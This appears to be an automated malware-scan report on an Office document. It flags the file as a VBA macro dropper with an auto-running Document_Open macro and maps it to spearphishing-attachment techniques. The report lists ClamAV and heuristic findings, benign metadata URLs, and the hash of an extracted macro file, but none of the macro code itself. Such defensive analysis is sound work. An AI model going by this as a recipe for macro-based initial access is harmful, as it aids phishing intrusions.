Verdict: MALICIOUS
Risk score: 122
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, including a Document_Open macro (code that runs automatically when the document is opened), a common technique for initial execution. The ClamAV detection 'Doc.Dropper.Agent-6361726-0' strongly suggests dropper functionality. The VBA code itself appears obfuscated and contains complex logic, but its presence together with the heuristic findings indicates an intent to download and execute further malicious content.
Heuristics (4)

- ClamAV: Doc.Dropper.Agent-6361726-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6361726-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): a Document_Open macro is present
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in the document text (OLE body) and are standard XMP/RDF/Dublin Core/DrawingML namespace identifiers of the kind carried by embedded image metadata, not download locations.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15497 bytes |

SHA-256 of macros.bas: 21b917a8e49719fa902e39715aff0f60d0574a1b98b668e80d42a563c6a1477f
Preview script: first 1,000 lines of the extracted script (truncated).